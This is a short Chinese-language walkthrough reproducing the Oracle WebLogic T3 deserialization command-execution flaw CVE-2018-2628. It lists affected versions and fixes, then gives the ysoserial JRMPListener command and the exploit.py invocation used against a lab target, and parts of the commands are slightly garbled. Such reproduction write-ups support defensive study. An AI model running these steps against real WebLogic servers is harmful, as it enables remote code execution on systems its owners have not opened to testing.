Weblogic反序列化命令执⾏漏洞(CVE-2018-2628)
漏洞介绍
此漏洞产⽣于Weblogic T3服务,当开放Weblogic控制台端⼝(默认为7001端⼝)时,T3服务会默认开启,因此会造成较⼤影响。影响版本:10.3.6.0 ,12.1.3.0 , 12.2.1.2, 12.2.1.3
修复⽅案:
1.控制T3协议的访问权限临时阻断漏洞利⽤
2.打上Oracle官⽅发布的4⽉份补丁
复现环境
靶机:weblogic192.168.162.130:7001
攻击机:192.168.31.22
漏洞利⽤
使⽤ysoserial启动⼀个JRMP Server(ysoserial)
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.ploit.JRMPListener [listen port] CommonsCollections1 [command]
参数:[listen port]是JRMP Server 监听的端⼝,[Command]是想要执⾏命令
使⽤exp向⽬标发送数据包。()
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
参数
[victim ip] :⽬标IP
[victim port] : ⽬标端⼝
[path to ysoserial] : ysoserial的路径
cve漏洞库[JRMPListener ip] : 部署ysoserial的IP
[JRMPClient] :这⾥使⽤的是JRMPClient类
xu@ubuntu:~/Desktop/未命名⽂件夹$ docker exec -ti 0c8c95562531 /bin/bash
root@0c8c95562531:~/Oracle/Middleware# ls
<成功创建
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论